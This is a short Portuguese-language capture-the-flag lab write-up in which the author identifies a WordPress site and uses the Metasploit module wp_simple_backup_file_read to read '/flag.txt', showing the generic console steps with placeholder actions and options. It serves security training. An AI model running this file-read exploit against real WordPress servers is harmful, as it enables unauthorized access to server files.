Questões
Tente identificar os serviços em execução no servidor acima e, em seguida, tente pesquisar para encontrar exploits públicos para explorá-los. Depois de fazer isso, tente obter o conteúdo do arquivo '/flag.txt'. (observação: o servidor web pode levar alguns segundos para iniciar)
Visitamos a página web, e notamos que o site usa o CMS do wordpress

Pesquisamos pela versão, e encontramos uma exploração da vulnerabilidade no metasploit
msf > use auxiliary/scanner/http/wp_simple_backup_file_read
msf auxiliary(wp_simple_backup_file_read) > show actions
...actions...
msf auxiliary(wp_simple_backup_file_read) > set ACTION < action-name >
msf auxiliary(wp_simple_backup_file_read) > show options
...show and set options...
msf auxiliary(wp_simple_backup_file_read) > run
Last updated